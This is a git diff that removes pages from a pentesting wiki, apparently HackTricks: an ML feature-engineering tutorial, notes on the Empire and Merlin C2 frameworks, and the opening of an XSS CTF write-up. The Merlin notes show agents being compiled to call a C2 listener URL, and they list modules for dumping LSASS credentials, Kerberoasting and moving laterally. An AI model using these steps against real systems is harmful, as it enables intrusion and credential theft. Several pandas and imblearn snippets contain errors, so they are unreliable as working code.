diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md
deleted file mode 100644
index cfeec6e71..000000000
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md
+++ /dev/null
@@ -1,34 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md
deleted file mode 100644
index 5dc0c6fa3..000000000
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md
+++ /dev/null
@@ -1,324 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-# Basic types of possible data
-
-Data can be **continuous** (**infinity** values) or **categorical** (nominal) where the amount of possible values are **limited**.
-
-## Categorical types
-
-### Binary
-
-Just **2 possible values**: 1 or 0. In case in a dataset the values are in string format (e.g. "True" and "False") you assign numbers to those values with:
-
-```python
-dataset["column2"] = dataset.column2.map({"T": 1, "F": 0})
-```
-
-### **Ordinal**
-
-The **values follows an order**, like in: 1st place, 2nd place... If the categories are strings (like: "starter", "amateur", "professional", "expert") you can map them to numbers as we saw in the binary case.
-
-```python
-column2_mapping = {'starter':0,'amateur':1,'professional':2,'expert':3}
-dataset['column2'] = dataset.column2.map(column2_mapping)
-```
-
-* For **alphabetic columns** you can order them more easily:
-
-```python
-# First get all the uniq values alphabetically sorted
-possible_values_sorted = dataset.column2.sort_values().unique().tolist()
-# Assign each one a value
-possible_values_mapping = {value:idx for idx,value in enumerate(possible_values_sorted)}
-dataset['column2'] = dataset.column2.map(possible_values_mapping)
-```
-
-### **Cyclical**
-
-Looks **like ordinal value** because there is an order, but it doesn't mean one is bigger than the other. Also the **distance between them depends on the direction** you are counting. Example: The days of the week, Sunday isn't "bigger" than Monday.
-
-* There are **different ways** to encode cyclical features, ones may work with only just some algorithms. **In general, dummy encode can be used**
-
-```python
-column2_dummies = pd.get_dummies(dataset.column2, drop_first=True)
-dataset_joined = pd.concat([dataset[['column2']], column2_dummies], axis=1)
-```
-
-### **Dates**
-
-Date are **continuous** **variables**. Can be seen as **cyclical** (because they repeat) **or** as **ordinal** variables (because a time is bigger than a previous one).
-
-* Usually dates are used as **index**
-
-```python
-# Transform dates to datetime
-dataset["column_date"] = pd.to_datetime(dataset.column_date)
-# Make the date feature the index
-dataset.set_index('column_date', inplace=True)
-print(dataset.head())
-
-# Sum usage column per day
-daily_sum = dataset.groupby(df_daily_usage.index.date).agg({'usage':['sum']})
-# Flatten and rename usage column
-daily_sum.columns = daily_sum.columns.get_level_values(0)
-daily_sum.columns = ['daily_usage']
-print(daily_sum.head())
-
-# Fill days with 0 usage
-idx = pd.date_range('2020-01-01', '2020-12-31')
-daily_sum.index = pd.DatetimeIndex(daily_sum.index)
-df_filled = daily_sum.reindex(idx, fill_value=0) # Fill missing values
-
-
-# Get day of the week, Monday=0, Sunday=6, and week days names
-dataset['DoW'] = dataset.transaction_date.dt.dayofweek
-# do the same in a different way
-dataset['weekday'] = dataset.transaction_date.dt.weekday
-# get day names
-dataset['day_name'] = dataset.transaction_date.apply(lambda x: x.day_name())
-```
-
-### Multi-category/nominal
-
-**More than 2 categories** with no related order. Use `dataset.describe(include='all')` to get information about the categories of each feature.
-
-* A **referring string** is a **column that identifies an example** (like a name of a person). This can be duplicated (because 2 people may have the same name) but most will be unique. This data is **useless and should be removed**.
-* A **key column** is used to **link data between tables**. In this case the elements are unique. his data is **useless and should be removed**.
-
-To **encode multi-category columns into numbers** (so the ML algorithm understand them), **dummy encoding is used** (and **not one-hot encoding** because it **doesn't avoid perfect multicollinearity**).
-
-You can get a **multi-category column one-hot encoded** with `pd.get_dummies(dataset.column1)`. This will transform all the classes in binary features, so this will create **one new column per possible class** and will assign 1 **True value to one column**, and the rest will be false.
-
-You can get a **multi-category column dummie encoded** with `pd.get_dummies(dataset.column1, drop_first=True)`. This will transform all the classes in binary features, so this will create **one new column per possible class minus one** as the **last 2 columns will be reflect as "1" or "0" in the last binary column created**. This will avoid perfect multicollinearity, reducing the relations between columns.
-
-# Collinear/Multicollinearity
-
-Collinear appears when **2 features are related to each other**. Multicollineratity appears when those are more than 2.
-
-In ML **you want that your features are related with the possible results but you don't want them to be related between them**. That's why the **dummy encoding mix the last two columns** of that and **is better than one-hot encoding** which doesn't do that creating a clear relation between all the new featured from the multi-category column.
-
-VIF is the **Variance Inflation Factor** which **measures the multicollinearity of the features**. A value **above 5 means that one of the two or more collinear features should be removed**.
-
-```python
-from statsmodels.stats.outliers_influence import variance_inflation_factor
-from statsmodels.tools.tools import add_constant
-
-#dummies_encoded = pd.get_dummies(dataset.column1, drop_first=True)
-onehot_encoded = pd.get_dummies(dataset.column1)
-X = add_constant(onehot_encoded) # Add previously one-hot encoded data
-print(pd.Series([variance_inflation_factor(X.values,i) for i in range(X.shape[1])], index=X.columns))
-```
-
-# Categorical Imbalance
-
-This occurs when there is **not the same amount of each category** in the training data.
-
-```python
-# Get statistic of the features
-print(dataset.describe(include='all'))
-# Get an overview of the features
-print(dataset.info())
-# Get imbalance information of the target column
-print(dataset.target_column.value_counts())
-```
-
-In an imbalance there is always a **majority class or classes** and a **minority class or classes**.
-
-There are 2 main ways to fix this problem:
-
-* **Undersampling**: Removing randomly selected data from the majority class so it has the same number of samples as the minority class.
-
-```python
-from imblearn.under_sampling import RandomUnderSampler
-rus = RandomUserSampler(random_state=1337)
-
-X = dataset[['column1', 'column2', 'column3']].copy()
-y = dataset.target_column
-
-X_under, y_under = rus.fit_resample(X,y)
-print(y_under.value_counts()) #Confirm data isn't imbalanced anymore
-```
-
-* **Oversampling**: Generating more data for the minority class until it has as many samples as the majority class.
-
-```python
-from imblearn.under_sampling import RandomOverSampler
-ros = RandomOverSampler(random_state=1337)
-
-X = dataset[['column1', 'column2', 'column3']].copy()
-y = dataset.target_column
-
-X_over, y_over = ros.fit_resample(X,y)
-print(y_over.value_counts()) #Confirm data isn't imbalanced anymore
-```
-
-You can use the argument **`sampling_strategy`** to indicate the **percentage** you want to **undersample or oversample** (**by default it's 1 (100%)** which means to equal the number of minority classes with majority classes)
-
-{% hint style="info" %}
-Undersamplig or Oversampling aren't perfect if you get statistics (with `.describe()`) of the over/under-sampled data and compare them to the original you will see **that they changed.** Therefore oversampling and undersampling are modifying the training data.
-{% endhint %}
-
-## SMOTE oversampling
-
-**SMOTE** is usually a **more trustable way to oversample the data**.
-
-```python
-from imblearn.over_sampling import SMOTE
-
-# Form SMOTE the target_column need to be numeric, map it if necessary
-smote = SMOTE(random_state=1337)
-X_smote, y_smote = smote.fit_resample(dataset[['column1', 'column2', 'column3']], dataset.target_column)
-dataset_smote = pd.DataFrame(X_smote, columns=['column1', 'column2', 'column3'])
-dataset['target_column'] = y_smote
-print(y_smote.value_counts()) #Confirm data isn't imbalanced anymore
-```
-
-# Rarely Occurring Categories
-
-Imagine a dataset where one of the target classes **occur very little times**.
-
-This is like the category imbalance from the previous section, but the rarely occurring category is occurring even less than "minority class" in that case. The **raw** **oversampling** and **undersampling** methods could be also used here, but generally those techniques **won't give really good results**.
-
-## Weights
-
-In some algorithms it's possible to **modify the weights of the targeted data** so some of them get by default more importance when generating the model.
-
-```python
-weights = {0: 10 1:1} #Assign weight 10 to False and 1 to True
-model = LogisticRegression(class_weight=weights)
-```
-
-You can **mix the weights with over/under-sampling techniques** to try to improve the results.
-
-## PCA - Principal Component Analysis
-
-Is a method that helps to reduce the dimensionality of the data. It's going to **combine different features** to **reduce the amount** of them generating **more useful features** (_less computation is needed_).
-
-The resulting features aren't understandable by humans, so it also **anonymize the data**.
-
-# Incongruent Label Categories
-
-Data might have mistakes for unsuccessful transformations or just because human error when writing the data.
-
-Therefore you might find the **same label with spelling mistakes**, different **capitalisation**, **abbreviations** like: _BLUE, Blue, b, bule_. You need to fix these label errors inside the data before training the model.
-
-You can clean this issues by lowercasing everything and mapping misspelled labels to the correct ones.
-
-It's very important to check that **all the data that you have contains is correctly labeled**, because for example, one misspelling error in the data, when dummie encoding the classes, will generate a new column in the final features with **bad consequences for the final model**. This example can be detected very easily by one-hot encoding a column and checking the names of the columns created.
-
-# Missing Data
-
-Some data of the study may be missing.
-
-It might happen that some complete random data is missing for some error. This is kind of da ta is **Missing Completely at Random** (**MCAR**).
-
-It could be that some random data is missing but there is something making some specific details more probable to be missing, for example more frequently man will tell their their age but not women. This is call **Missing at Random** (**MAR**).
-
-Finally, there could be data **Missing Not at Random** (**MNAR**). The vale of the data is directly related with the probability of having the data. For example, if you want to measure something embarrassing, the most embarrassing someone is, the less probable he is going to share it.
-
-The **two first categories** of missing data can be **ignorable**. But the **third one** requires to consider **only portions of the data** that isn't impacted or to try to **model the missing data somehow**.
-
-One way to find about missing data is to use `.info()` function as it will indicate the **number of rows but also the number of values per category**. If some category has less values than number of rows, then there is some data missing:
-
-```bash
-# Get info of the dataset
-dataset.info()
-
-# Drop all rows where some value is missing
-dataset.dropna(how='any', axis=0).info()
-```
-
-It's usually recommended that if a feature is **missing in more than the 20%** of the dataset, the **column should be removed:**
-
-```bash
-# Remove column
-dataset.drop('Column_name', axis='columns', inplace=True)
-dataset.info()
-```
-
-{% hint style="info" %}
-Note that **not all the missing values are missing in the dataset**. It's possible that missing values have been giving the value "Unknown", "n/a", "", -1, 0... You need to check the dataset (using `dataset.column`_`name.value`_`counts(dropna=False)` to check the possible values).
-{% endhint %}
-
-If some data is missing in the dataset (in it's not too much) you need to find the **category of the missing data**. For that you basically need to know if the **missing data is at random or not**, and for that you need to find if the **missing data was correlated with other data** of the dataset.
-
-To find if a missing value if correlated with another column, you can create a new column that put 1s and 0s if the data is missing or isn't and then calculate the correlation between them:
-
-```bash
-# The closer it's to 1 or -1 the more correlated the data is
-# Note that columns are always perfectly correlated with themselves.
-dataset[['column_name', 'cloumn_missing_data']].corr()
-```
-
-If you decide to ignore the missing data you still need to do what to do with it: You can **remove the rows** with missing data (the train data for the model will be smaller), you can r**emove the feature** completely, or could **model it**.
-
-You should **check the correlation between the missing feature with the target column** to see how important that feature is for the target, if it's really **small** you can **drop it or fill it**.
-
-To fill missing **continuous data** you could use: the **mean**, the **median** or use an **imputation** algorithm. The imputation algorithm can try to use other features to find a value for the missing feature:
-
-```python
-from sklearn.impute import KNNImputer
-
-X = dataset[['column1', 'column2', 'column3']]
-y = dataset.column_target
-
-# Create the imputer that will fill the data
-imputer = KNNImputer(n_neightbors=2, weights='uniform')
-X_imp = imputer.fit_transform(X)
-
-# Check new data
-dataset_imp = pd.DataFrame(X_imp)
-dataset.columns = ['column1', 'column2', 'column3']
-dataset.iloc[10:20] # Get some indexes that contained empty data before
-```
-
-To fill categorical data first of all you need to think if there is any reason why the values are missing. If it's by **choice of the users** (they didn't want to give the data) maybe yo can **create a new category** indicating that. If it's because of human error you can **remove the rows** or the **feature** (check the steps mentioned before) or **fill it with the mode, the most used category** (not recommended).
-
-# Combining Features
-
-If you find **two features** that are **correlated** between them, usually you should **drop** one of them (the one that is less correlated with the target), but you could also try to **combine them and create a new feature**.
-
-```python
-# Create a new feautr combining feature1 and feature2
-dataset['new_feature'] = dataset.column1/dataset.column2
-
-# Check correlation with target column
-dataset[['new_feature', 'column1', 'column2', 'target']].corr()['target'][:]
-
-# Check for collinearity of the 2 features and the new one
-X = add_constant(dataset[['column1', 'column2', 'target']])
-# Calculate VIF
-pd.Series([variance_inflation_factor(X.values, i) for i in range(X.shape[1])], index=X.columns)
-```
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
diff --git a/backdoors/empire.md b/backdoors/empire.md
deleted file mode 100644
index cfeec6e71..000000000
--- a/backdoors/empire.md
+++ /dev/null
@@ -1,34 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
diff --git a/backdoors/merlin.md b/backdoors/merlin.md
deleted file mode 100644
index 6df1729e5..000000000
--- a/backdoors/merlin.md
+++ /dev/null
@@ -1,122 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-# Installation
-
-## Install GO
-
-```
-#Download GO package from: https://golang.org/dl/
-#Decompress the packe using:
-tar -C /usr/local -xzf go$VERSION.$OS-$ARCH.tar.gz
-
-#Change /etc/profile
-Add ":/usr/local/go/bin" to PATH
-Add "export GOPATH=$HOME/go"
-Add "export GOBIN=$GOPATH/bin"
-
-source /etc/profile
-```
-
-## Install Merlin
-
-```
-go get https://github.com/Ne0nd0g/merlin/tree/dev #It is recommended to use the developer branch
-cd $GOPATH/src/github.com/Ne0nd0g/merlin/
-```
-
-# Launch Merlin Server
-
-```
-go run cmd/merlinserver/main.go -i
-```
-
-# Merlin Agents
-
-You can [download precompiled agents](https://github.com/Ne0nd0g/merlin/releases)
-
-## Compile Agents
-
-Go to the main folder _$GOPATH/src/github.com/Ne0nd0g/merlin/_
-
-```
-#User URL param to set the listener URL
-make #Server and Agents of all
-make windows #Server and Agents for Windows
-make windows-agent URL=https://malware.domain.com:443/ #Agent for windows (arm, dll, linux, darwin, javascript, mips)
-```
-
-## **Manual compile agents**
-
-```
-GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -o agent.exe main.g
-```
-
-# Modules
-
-**The bad news is that every module used by Merlin is downloaded from the source (Github) and saved on disk before using it. Be careful about when using well-known modules because Windows Defender will catch you!**
-
-
-**SafetyKatz** --> Modified Mimikatz. Dump LSASS to file and launch:sekurlsa::logonpasswords to that file\
-**SharpDump** --> minidump for the process ID specified (LSASS by default) (Itsais that the extension of the final file is .gz but indeed it is.bin, but is agz file)\
-**SharpRoast** --> Kerberoast (doesn't work)\
-**SeatBelt** --> Local Security Tests in CS (does not work) https://github.com/GhostPack/Seatbelt/blob/master/Seatbelt/Program.cs\
-**Compiler-CSharp** --> Compile using csc.exe /unsafe\
-**Sharp-Up** -->Allchecks in C# in powerup (works)\
-**Inveigh** --> PowerShellADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool (doesn't works, need to load: https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1)\
-**Invoke-InternalMonologue** --> Impersonates all available users and retrieves a challenge-response for each (NTLM hash for each user) (bad url)\
-**Invoke-PowerThIEf** --> Steal forms from IExplorer or make it execute JS or inject a DLL in that process (doesnt work) (and the PS looks like doesnt work either) https://github.com/nettitude/Invoke-PowerThIEf/blob/master/Invoke-PowerThIEf.ps1\
-**LaZagneForensic** --> Get browser passwords (works but dont prints the output directory)\
-**dumpCredStore** --> Win32 Credential Manager API (https://github.com/zetlen/clortho/blob/master/CredMan.ps1) https://www.digitalcitizen.life/credential-manager-where-windows-stores-passwords-other-login-details\
-**Get-InjectedThread** --> Detect classic injection in running processes (Classic Injection (OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread)) (doesnt works)\
-**Get-OSTokenInformation** --> Get Token Info of the running processes and threads (User, groups, privileges, owner… https://docs.microsoft.com/es-es/windows/desktop/api/winnt/ne-winnt-\_token_information_class)\
-**Invoke-DCOM** --> Execute a command (inother computer) via DCOM (http://www.enigma0x3.net.) (https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/)\
-**Invoke-DCOMPowerPointPivot** --> Execute a command in othe PC abusing PowerPoint COM objects (ADDin)\
-**Invoke-ExcelMacroPivot** --> Execute a command in othe PC abusing DCOM in Excel\
-**Find-ComputersWithRemoteAccessPolicies** --> (not working) (https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/)\
-**Grouper** --> It dumps all the most interesting parts of group policy and then roots around in them for exploitable stuff. (deprecated) Take a look at Grouper2, looks really nice\
-**Invoke-WMILM** --> WMI to move laterally\
-**Get-GPPPassword** --> Look for groups.xml, scheduledtasks.xml, services.xmland datasources.xml and returns plaintext passwords (insidedomain)\
-**Invoke-Mimikatz** --> Use mimikatz (default dump creds)\
-**PowerUp** --> https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc\
-**Find-BadPrivilege** --> Check the privileges of users in computers\
-**Find-PotentiallyCrackableAccounts** --> Retrieve information about user accounts associated with SPN (Kerberoasting)\
-**psgetsystem** --> getsystem
-
-**Didn't check persistence modules**
-
-# Resume
-
-I really like the feeling and the potential of the tool.\
-I hope the tool will start downloading the modules from the server and integrates some kind of evasion when downloading scripts.
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
diff --git a/cryptography/rc4-encrypt-and-decrypt.md b/cryptography/rc4-encrypt-and-decrypt.md
index 42b710470..e951992a4 100644
--- a/cryptography/rc4-encrypt-and-decrypt.md
+++ b/cryptography/rc4-encrypt-and-decrypt.md
@@ -15,7 +15,7 @@ Other ways to support HackTricks:
 </details>
 
 
-If you can somehow encrypt a plaintext using a RC4**,** you can decrypt any content encrypted by that RC4(using the same password) just using the encryption function.
+If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function.
 
 If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
 
diff --git a/ctf-write-ups/README.md b/ctf-write-ups/README.md
deleted file mode 100644
index 25c03fb3f..000000000
--- a/ctf-write-ups/README.md
+++ /dev/null
@@ -1,37 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-* [Write-up factory](https://writeup.raw.pm/) - Seach engine to find write-ups \(TryHackMe, HackTheBox, etc.\)
-* [CTFtime Write-ups](https://ctftime.org/writeups) - Newest write-ups added to CTF events on CTFtime
-
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
diff --git a/ctf-write-ups/challenge-0521.intigriti.io.md b/ctf-write-ups/challenge-0521.intigriti.io.md
deleted file mode 100644
index 301515386..000000000
--- a/ctf-write-ups/challenge-0521.intigriti.io.md
+++ /dev/null
@@ -1,196 +0,0 @@
-# challenge-0521.intigriti.io
-
-<details>
-
-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
-
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-
-</details>
-
-### Brief Description <a href="#brief-description" id="brief-description"></a>
-
-The challenge provides a vulnerable to XSS form in the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php).\
-This form is loaded in [https://challenge-0521.intigriti.io/](https://challenge-0521.intigriti.io) via an iframe.
-
-It was found that the form will **insert the user input inside the JavaScript `eval` function**. This is usually a bad idea as it can lead to **arbitrary JavaScript execution**, and this is a good example.\
-However, before inserting the user input inside the`eval` function, it’s checked with the regexp `/[a-df-z<>()!\\='"]/gi` so if any of those character is found, the user input won’t be executed inside `eval`.\
-Anyway, it was found a way to bypass the regexp protection and execute `alert(document.domain)` abusing the dangerous `eval` function.
-
-### Accessing the HTML <a href="#accessing-the-html" id="accessing-the-html"></a>
-
